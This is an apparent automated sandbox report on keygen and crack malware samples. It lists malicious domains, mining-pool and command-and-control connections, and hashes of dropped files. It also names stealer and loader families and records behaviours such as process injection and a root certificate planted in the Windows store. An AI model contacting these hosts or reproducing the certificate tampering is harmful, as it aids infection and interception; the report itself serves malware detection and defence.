US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 xmr-eu2.nanopool.org udp
UA 194.145.227.161:80 tcp
PL 51.68.137.186:14433 xmr-eu2.nanopool.org tcp
US 8.8.8.8:53 pastebin.com udp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 xmr-eu1.nanopool.org udp
FR 141.94.23.83:14433 xmr-eu1.nanopool.org tcp
US 8.8.8.8:53 186.137.68.51.in-addr.arpa udp
US 8.8.8.8:53 24.19.67.172.in-addr.arpa udp
US 8.8.8.8:53 83.23.94.141.in-addr.arpa udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 wfsdragon.ru udp
US 104.21.5.208:80 wfsdragon.ru tcp
MX 31.210.20.251:80 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 208.5.21.104.in-addr.arpa udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
UA 194.145.227.161:80 tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
UA 194.145.227.161:80 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
UA 194.145.227.161:80 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp

Files

memory/1856-0-0x0000000000F50000-0x0000000001035000-memory.dmp

memory/3668-7-0x00000000012C0000-0x00000000012D8000-memory.dmp

memory/1948-17-0x0000000000400000-0x00000000004E5000-memory.dmp

C:\Windows\winnetdriv.exe

MD5 265cadde82b0c66dc39ad2d9ee800754
SHA1 2e9604eade6951d5a5b4a44bee1281e32166f395
SHA256 40fd6a0b671a0e5074a206201f57f7731a0d01baab5874b28a9b0f019a451c5a
SHA512 c99f3a5464e1ac02402814401c2cb66a9fafb794356395c1081bdf3c4c3534086498c19efe4055780a52a1bb80db81658c2cb4af5271015af51edf7bd3865e7b

memory/4840-39-0x0000000000400000-0x0000000000420000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe

MD5 51ef03c9257f2dd9b93bfdd74e96c017
SHA1 3baa7bee4b4b7d3ace13409d69dc7bcd0399ac34
SHA256 82a022b29bda763ef9f2ce01c82c82e199182d1d0243cca9811eccc1d993cecf
SHA512 2c97e5d08c9be89ca45153511e0976abfabf41e25d4187dcb7586ba125b6d8d763b99e79043ac1504203c26c7ab47a9246d9a0235b469f6c611703d4e2ae00e1

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe

MD5 7126148bfe5ca4bf7e098d794122a9a3
SHA1 3fe6be3ee8bf1a0c99139b146913c8c6acd7dd64
SHA256 f8c0350d71e5dd14438d477f73915c4845290c7f0620656624722183b76013f5
SHA512 0bec6450d1be17489436de7a5186dbcb88089edd4227c3b5484460c9368e5ca0a2d88c385d31989f449a5d8cc347057c80a997682d6c0ed1b9cfcb85c677eb48

C:\Users\Admin\AppData\Local\Temp\RarSFX1\JOzWR.dat

MD5 12476321a502e943933e60cfb4429970
SHA1 c71d293b84d03153a1bd13c560fca0f8857a95a7
SHA256 14a0fbd7eab461e49ee161ac3bd9ad8055086dbe56848dbaba9ec2034b3dea29
SHA512 f222de8febc705146394fd389e6cece95b077a0629e18eab91c49b139bf5b686435e28a6ada4a0dbb951fd24ec3db692e7a5584d57ffd0e851739e595f2bbfdc

C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe

MD5 8902f8193024fa4187ca1aad97675960
SHA1 37a4840c9657205544790c437698b54ca33bfd9d
SHA256 95de484851569f225488320d573e398ebc2312b2d85b6c2b255b63b21aebb82f
SHA512 c351204604cb24c45ddb26847a22f5487a2942ad2b2361dbd31ce0a308c281be91658907d7fe04b483f053b7f9b0c680cae11361709ba7552f7921e727241938

memory/3012-78-0x0000000000D20000-0x0000000000EF6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\chrome3.exe

MD5 4b0d49f7c8712d7a0d44306309f2e962
SHA1 5f0a2536f215babccf860c7ccdeaf7055bb59cad
SHA256 f996915ce7203dc3661afa686637426fab14c91682ada02054d2f64ce245af60
SHA512 50dc00bebdafdc2cc1792a45cab5f13773ff0026c20618eec29f50000261afba65f58cec5d30be0fd5aaea17cac30b97b16be70c6f430987cd10a8488948ee2b

C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe

MD5 13e802bd360e44591d7d23036ce1fd33
SHA1 091a58503734848a4716382862526859299ef345
SHA256 e24c3eda7673062c9b243a09bc91e608f4d9dcc5de27db025b5ad150ae014f2b
SHA512 8bb52a3b0852cc345be7d4b50b19c3778bcae5cb7ee654aced93772bee6fd22d1e87c484d91afb10af040d7c52b0f1e0b60de47a28d8eeea5e3c6afcead6163b

memory/3744-98-0x00000000004E0000-0x00000000004F0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2.exe

MD5 a5bace3c3c2fa1cb766775746a046594
SHA1 9998cad5ba39e0be94347fcd2a2affd0c0a25930
SHA256 617de4cdc27fb67b299a0d95ff2129d0ea2488040bcfd5f64868a0fab33af7a6
SHA512 66f0cb5b820014a8d73bab706de8138d22a4d690d77726ac53b785daf99ed45646c8b0236bf10e209039f78324a63c3ee1c2f7ccf852fa7d579753cb9f659184

memory/5020-113-0x0000000000550000-0x0000000000570000-memory.dmp

memory/3124-114-0x00000000000C0000-0x00000000000C8000-memory.dmp

memory/5020-119-0x0000000000E30000-0x0000000000E4A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\setup.exe

MD5 0ebb4afbb726f3ca17896a0274b78290
SHA1 b543a593cfa0cc84b6af0457ccdc27c1b42ea622
SHA256 2fd099e9c096efb59756565d50243387d7669d60c2088e842f1f5d9ef297b6d2
SHA512 284063f08667af11bc593dcb88f19d2bc6b9fd1e2edf368fdc78f07c9956fa3078673ee7dd7ca349e32cb1f848edfeab3b6a758eac5e5c3d36dc1a8764353d11

C:\Users\Admin\AppData\Local\Temp\jhuuee.exe

MD5 f9be28007149d38c6ccb7a7ab1fcf7e5
SHA1 eba6ac68efa579c97da96494cde7ce063579d168
SHA256 5f6fc7b3ebd510eead2d525eb22f80e08d8aeb607bd4ea2bbe2eb4b5afc92914
SHA512 8806ff483b8a2658c042e289149e7810e2fb6a72fb72adbf39ed10a41dbab3131e8dfdaca4b4dba62ed767e53d57bd26c4d8005ce0b057606662b9b8ebb83171

C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe

MD5 f250a9c692088cce4253332a205b1649
SHA1 109c79124ce2bda06cab50ea5d97294d13d42b20
SHA256 0a6c3a23510f93fcdcb6d5acc53ccccbcc51c68f14b1bcbd758ffbf135f8e882
SHA512 80553664f188ae35cef1f89d188fb17df8a490367f8d6fa5f9897115bacf776373905bccd599353add684c7fa6c2554d04cbf1a7f6cc87b299d6c51da33c1b5e

memory/4920-144-0x0000000000400000-0x0000000000667000-memory.dmp

memory/4920-150-0x0000000000400000-0x0000000000667000-memory.dmp

memory/4388-149-0x0000000000400000-0x0000000002B59000-memory.dmp

memory/3744-156-0x0000000003010000-0x0000000003022000-memory.dmp

memory/3744-155-0x00000000015C0000-0x00000000015CE000-memory.dmp

memory/4920-159-0x0000000003960000-0x0000000003970000-memory.dmp

memory/4920-165-0x0000000003AC0000-0x0000000003AD0000-memory.dmp

memory/4920-172-0x0000000004570000-0x0000000004578000-memory.dmp

memory/4920-173-0x0000000004590000-0x0000000004598000-memory.dmp

memory/4920-175-0x0000000004630000-0x0000000004638000-memory.dmp

memory/4920-178-0x0000000004780000-0x0000000004788000-memory.dmp

memory/4920-179-0x00000000047A0000-0x00000000047A8000-memory.dmp

memory/4920-180-0x0000000004A40000-0x0000000004A48000-memory.dmp

memory/4920-181-0x0000000004940000-0x0000000004948000-memory.dmp

memory/4920-182-0x00000000047B0000-0x00000000047B8000-memory.dmp

memory/4920-195-0x0000000004590000-0x0000000004598000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm

MD5 88d88711598409c91cb0bf7a163ac6ba
SHA1 9ec2e16eb9e63b3489cef82dde59cd96af9a79ee
SHA256 2da7cbc011b75277e017a54f9092ad9984aa9d8e5dab82122ce08b98b9bd76b1
SHA512 74ea46be227a919b208ab9b06f851b0076510ccba3b6032534d742702c85ad61843bef7e1add37b47026bc9f8f5f1996922339fc38c212220ea6f872756c7a06

memory/4920-203-0x00000000047B0000-0x00000000047B8000-memory.dmp

memory/4920-205-0x00000000048E0000-0x00000000048E8000-memory.dmp

memory/4920-218-0x0000000004590000-0x0000000004598000-memory.dmp

memory/4920-226-0x00000000048E0000-0x00000000048E8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm

MD5 5d9270ca7f3d21d2c85271e25df5b750
SHA1 c324dbe597897807248d70eb5c2ff3ae88101f8b
SHA256 267b645fc4f9eeade4f0eabd14b52f87d07fed7858e9126a761555a153b8045f
SHA512 bc86894fdf0d24fde10c5589ddfe2fb4852684cc28d4d0eef37ea6a4e5d4dd48f46b978953a42eff8f4dac64e5993ebf50808913ead77084194491d0e068b133

memory/4920-228-0x00000000047B0000-0x00000000047B8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm

MD5 9f139deb18340bcc42cf9a9f150aafe6
SHA1 42b7d6d812376bb1515b042e353ebfe913aad0ec
SHA256 5c8808081c52a62c2a61ca28407b4561c5f0f8c65efea54d057f60d0cdd331f7
SHA512 e71f672fa664c356068cba895d345ae6062fefca00d5b8fd1c527df2af2b0909b43b071b63a8966e0525dae7c7f1ccd889809e93cd10180bc0ba35e0de14fbb1

C:\Users\Admin\AppData\Local\Temp\RarSFX0\d

MD5 f648d6275daa9e8931d9f308effb2e54
SHA1 c70e546ed9748f2e82411bf74f26913165568e68
SHA256 1c97e0f7c63973051f4789977ff99a48e57a7d652ecdd13e2baa23e574da03c2
SHA512 6a01951cb168960cc703fb3d9ef30d41d2a8b551cb6d73700654b8c4ca91ad477b1eabe85b3563f8ea3400c9107b2bfa3302334471db6f2a52f0e4848a1de597

C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm

MD5 8a2643f4b45c073f6cf736c7cffdb804
SHA1 2acb9d845b2d6727b586e312b1760e092eaef4f0
SHA256 98105eeeff066d4588ae7025b580e927ae567ccef7362fd3a37b2698c4862943
SHA512 f4b57c399bf85c0c47f7789f071d1a6402d641ba930ebf4c5cd3e4f06d6a6f0f04ce5ae335454c495f229eec41a9b4aba50dcda973c0e2350cfa37ab5a1e8c97

C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm

MD5 cc3ecd660174673340e9caab0b926f80
SHA1 a676a5774d17aa695d3ab63f8954fd55dfa3a587
SHA256 c1d5d14141e0fa66c604ccfd06d23caf02e2076ff74f69aca018da32d31ef638
SHA512 3afb8e8f8fa5f30b9037e44dcac6736e0bbf707725599fcf4e73ee36fc72f9b1e8f383df0152ebe2bfb029bfa46437aba05151035ad8230396495c383323a351

C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm

MD5 544016fa16b1eeddc26762dab9e42b8d
SHA1 d78b947cc7414bf1360682714502ddd0c5636b3f
SHA256 8a244b95cf1989a024507e57d9c2499c118e2f3bf0ee9e6af5755c84db0101f9
SHA512 176f01e1b66f2eae5bd55775ed5fc2c5dbccba747bf1950221a48a74b57176d293e6d80b65235a932a090928f6ea4a4be3b116b48ba8414974b458791384e51c

C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm

MD5 fc585a35047da6dbbb3d70d5baaabe73
SHA1 bbb25a1da44cddcf636e7aa787c8aff97fed3497
SHA256 1161eccf59ac9815f8a7624d308fb56018c79344a39affec419691a2cf16bcaa
SHA512 18b125c21796ebf29eb422dd720488830918b3ef56db9bf8a7a6b348d1d43e717644eaebac6e8698cd6041d051834e414504fe62ae60e167a9207af73622271d

C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm

MD5 7fa2720a93d7206a3cdba2d8f87e1346
SHA1 99ba4629bab4fa0069846285950e87d0c482e77b
SHA256 91cf845a05348020c8b459d8ac7c4d01d920441d35843642a9668230c4bc4f4e
SHA512 a8d8292399e2f72286576ab6c9e9aa592d7bc5c8f9929a340d3cf2b3451b68738492eeafb59012da38000b3ba2f97d1aba59d716b39b33b7dee2716bb4e51a55

C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm

MD5 8f8ef5e71647faa15122f7696013191d
SHA1 82d490b760bbfa59d4082bb4ddeb2f8dd8272723
SHA256 206083cc3bb446324b5374218e933f9465d674b4c4b561f40da950a7060374eb
SHA512 65256670022351f9d1a9ae31eb98cf2a3908ae3e486e10e9cb71897b9fc38e7fbfc6a07635231ada87361aa422d7401cbbecb5694eacf7d44ddbc23309c3c567

C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm

MD5 7109832a59d317e32758ee931a784b70
SHA1 3d458effa91b3b4f9b5233cb68a1a6e1eafbce63
SHA256 1f2974df584934022f4b9ebbd58dcc793d54cd828ee3be400716ae1ebc10cf75
SHA512 4724239c27a7251255ff919c1f26aed49549540e6d14d50adbbb71a90e3ed9770d8e9665e8cc94af18483d660a492445d1c3ee03f71345ae7eb6ec825517009d

C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm

MD5 43370346acc17e84410028e700fed4e9
SHA1 5cbd1631245ce68521dbbec2d6b27760f17f49f0
SHA256 8e9b531e1cd47907657b52fcc0bde284ef210528258aa5dcc6c7d0ec1e76e701
SHA512 862b93c5da790fc02f556262e053c77bc747fb65965caf38e195cd44e034e5673df5becdedd0a9a858b2d8df105c66263da1755263b6b9aa7deefb0de530c420

C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm

MD5 d628ec48b246719f0b5e6abc9bd04d95
SHA1 096c1700bfdee5710d6b6d96db0e6ca70b9e13bc
SHA256 af63b35f8319a61ac7f0918b2170352eb0cbe5e920880f2d3613d59eba2f46c1
SHA512 80b5fb1970264c9cce164a59b9ca8fbeb7efcd2a46463157e2ceb46b501a628c1251cafaf06f2d28ebdd2bb1cfc4370c8bc351aeba8a216d56e889a17aa8f528

C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm

MD5 6d4da37038e0d3edad83cabee3a2e0e6
SHA1 63fb66513adb115ed7c741b505cd3fafecc7f423
SHA256 ec8153a8cd4172bef8240c8bcb9402416442a77585e8c4552ee0a93b6b7266bb
SHA512 0872e398b381803feaf8f07a702391dc13a43af4ba7278bef1e5638f588f3cf8448c68d3cf2fa46276ecc86a94505443d1137eeb4bdc2334b8744389dff80159

C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.INTEG.RAW

MD5 be1369965ea491a565233a8c107517ac
SHA1 30491598ca4a6658a80c5747b309375e442b8ce3
SHA256 0a52209b70d488721639a45e9997068e4cac3eaf6a4b8316d870e4a7b11285e5
SHA512 12c2e58a81908f14a94bbed1c8199e2a580bfef2df88f9b2f76ad09620fa376248b891cd7e92a8ba1d7da4bbe5d932842b503ef900b4ac7e8eb16e1a3a93794c

C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm

MD5 62bbf676f601e84937ab8ab66c6a6ed2
SHA1 b00bca87d930dc66a98ce8840a52e3c249e988d3
SHA256 069644a1fa72039671e938fea2ec756587bdfd154873402a7e2afc271799d56f
SHA512 a25687b67444dfdf54016151111172568aeaf7ecc7feb767bf4085b2d0b0b9c0661a3f5b25089fa0f62d53c7e7e65591715380ccf2162307445aadc22f0327b8

memory/4920-669-0x0000000000400000-0x0000000000667000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe

MD5 0388a1ce1bb8c076387b69ffcb3b40ec
SHA1 3ec08a53ec024d9be6346440848c37d0e0d7bb80
SHA256 448febc4311881856de2c237285907fe9470818e169946b0dbf1362f332e070a
SHA512 ea5af764d0373c8b9a5faf6d7094c76c9c321e227713bceecd49df50fa888e8fd04b1dfe16c4b75a8727717582b06383825e5d4317db1b875951ee240edd71d5

C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe

MD5 9a6071c1a67be3fb247f857fe5903bbf
SHA1 4a2e14763c51537e8695014007eceaf391a3f600
SHA256 01a9cb71df1d038bbec243ec7f2c1dd12d65a735297469c7f72be80886842e3c
SHA512 c862ed8670b48e23b081e1c91280599ffdd963e714665b80553b41540cb3584c823a25f05c75e47eaea1473c687a9ef7c9a219d724d059e5bd77ac6d127f5e68

memory/1156-689-0x0000000000020000-0x000000000003E000-memory.dmp

memory/1156-690-0x00000000006D0000-0x00000000006EA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe

MD5 7009fb80a52366b6c2cd8ec052a65791
SHA1 db0894463edf3ac11e5ca4b4584e8f10d75810f6
SHA256 767c546decf6f669263e4a0a87a0f5d92234e031e9a0de3733fa954a8f3e0255
SHA512 26e50e4b3d0b5fe866423b9ae0c02f61882f632fe4a16c05da117c02fae9aea26a6c81458e4b0bc2bda8acd0407565132f8bd6b7d3e828dd90fc280b1f15f079

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

MD5 9910203407b2605107587e954081c575
SHA1 8037bfb3b779fbbb3273df4f5c63d15b9589ce95
SHA256 07b00c604d6473439dcd16b47cbefa450aad400871cb2215f0814547aca81b49
SHA512 ba2c532d16eb259ae1621ac6ab668b4da28b2a842cb7320eee11982e2b835979c1ec6c566e3207e798fd2d0767070a568d2cd32dbb19200572afb2c7b32a68be

memory/4312-719-0x0000000000D30000-0x0000000000D36000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-08 22:25

Reported

2024-11-08 22:27

Platform

win7-20240903-en

Max time kernel

118s

Max time network

123s

Command Line

"C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe"

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe

"C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe"

Network

N/A

Files

N/A

Analysis: behavioral6

Detonation Overview

Submitted

2024-11-08 22:25

Reported

2024-11-08 22:27

Platform

win10v2004-20241007-en

Max time kernel

93s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe"

Signatures

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\winnetdriv.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\winnetdriv.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe N/A
File opened for modification C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\winnetdriv.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3060 wrote to memory of 3404 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe C:\Windows\winnetdriv.exe
PID 3060 wrote to memory of 3404 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe C:\Windows\winnetdriv.exe
PID 3060 wrote to memory of 3404 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe C:\Windows\winnetdriv.exe

Processes

C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe

"C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe"

C:\Windows\winnetdriv.exe

"C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe" 1731104712 0

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 www.wpdsfds23x.com udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 100.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp

Files

memory/3060-0-0x0000000000400000-0x00000000004E5000-memory.dmp

C:\Windows\winnetdriv.exe

MD5 265cadde82b0c66dc39ad2d9ee800754
SHA1 2e9604eade6951d5a5b4a44bee1281e32166f395
SHA256 40fd6a0b671a0e5074a206201f57f7731a0d01baab5874b28a9b0f019a451c5a
SHA512 c99f3a5464e1ac02402814401c2cb66a9fafb794356395c1081bdf3c4c3534086498c19efe4055780a52a1bb80db81658c2cb4af5271015af51edf7bd3865e7b

Analysis: behavioral7

Detonation Overview

Submitted

2024-11-08 22:25

Reported

2024-11-08 22:27

Platform

win7-20240903-en

Max time kernel

85s

Max time network

146s

Command Line

"C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

FFDroider

stealer ffdroider

FFDroider payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

Ffdroider family

ffdroider

GCleaner

loader gcleaner

Gcleaner family

gcleaner

OnlyLogger

loader onlylogger

Onlylogger family

onlylogger

PrivateLoader

loader privateloader

Privateloader family

privateloader

OnlyLogger payload

Description Indicator Process Target
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services64.exe N/A

Reads user/profile data of web browsers

spyware stealer

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Roaming\services64.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f